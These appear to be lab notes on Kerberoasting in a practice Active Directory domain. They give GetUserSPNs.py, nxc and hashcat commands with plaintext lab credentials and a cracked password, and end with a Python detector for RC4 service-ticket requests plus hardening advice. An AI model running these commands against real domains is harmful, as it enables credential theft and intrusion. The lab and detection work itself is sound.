⚔️5.1 - Kerberoasting

Kerberoasting with Credentials

GetUserSPNs.py -request -dc-ip 192.168.56.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberos.hashes

It returns all the hashes; the -outputfile flag saves them to a file.

With nxc

nxc ldap 192.168.56.11 -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting KERBEROASTING

The hashes are saved to a file named KERBEROASTING.

Cracking TGS Hashes

hashcat -m 13100 -a 0 --force kerberos.hashes /usr/share/wordlists/rockyou.txt

north/jon.snow:iknownothing <-- ANOTHER CRED!!
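Detection side, as an added example that is not part of the original notes: hashcat mode 13100 targets etype 23 (RC4-HMAC) TGS-REP hashes, and the matching service-ticket requests are logged on the domain controller as Event ID 4769 with TicketEncryptionType 0x17. The sketch below flags one account requesting RC4 tickets for several user-account services in a short window; the event records, the svc_* service names, the client IPs and the threshold are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Event ID 4769 records (fields already extracted from the Security log).
# Account names come from the notes; svc_* names, hosts and IPs are made up.
U = "brandon.stark@NORTH.SEVENKINGDOMS.LOCAL"
A = "arya.stark@NORTH.SEVENKINGDOMS.LOCAL"
EVENTS = [
    {"time": "2024-01-01T10:00:00", "user": U, "service": "jon.snow", "etype": "0x17", "ip": "192.168.56.50"},
    {"time": "2024-01-01T10:00:01", "user": U, "service": "svc_web", "etype": "0x17", "ip": "192.168.56.50"},
    {"time": "2024-01-01T10:00:02", "user": U, "service": "svc_sql", "etype": "0x17", "ip": "192.168.56.50"},
    {"time": "2024-01-01T10:00:03", "user": U, "service": "WINTERFELL$", "etype": "0x17", "ip": "192.168.56.50"},
    {"time": "2024-01-01T10:01:00", "user": A, "service": "svc_sql", "etype": "0x12", "ip": "192.168.56.22"},
    {"time": "2024-01-01T10:02:00", "user": A, "service": "krbtgt", "etype": "0x12", "ip": "192.168.56.22"},
]

RC4_HMAC = 0x17                 # etype 23, the type hashcat -m 13100 works on
WINDOW = timedelta(minutes=5)   # assumed tuning value
THRESHOLD = 3                   # distinct services per window (assumed tuning value)

def is_candidate(ev):
    """RC4 ticket for a service run by a user account (not a machine$ account or krbtgt)."""
    svc = ev["service"].lower()
    return (int(ev["etype"], 16) == RC4_HMAC
            and not svc.endswith("$") and svc != "krbtgt")

def detect_kerberoasting(events, window=WINDOW, threshold=THRESHOLD):
    """Return {requesting user: sorted services} for users who requested RC4 tickets
    for at least `threshold` distinct services inside one sliding window."""
    per_user = defaultdict(list)
    for ev in filter(is_candidate, events):
        per_user[ev["user"]].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    alerts = {}
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            services = {s for t, s in reqs[i:] if t - start <= window}
            if len(services) >= threshold:
                alerts[user] = sorted(services)
                break
    return alerts

if __name__ == "__main__":
    for user, services in detect_kerberoasting(EVENTS).items():
        print(f"ALERT {user}: RC4 service tickets for {services}")
```

Service accounts restricted to AES encryption types and given long random passwords (or converted to gMSAs) leave little for a wordlist run like the one above to recover.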
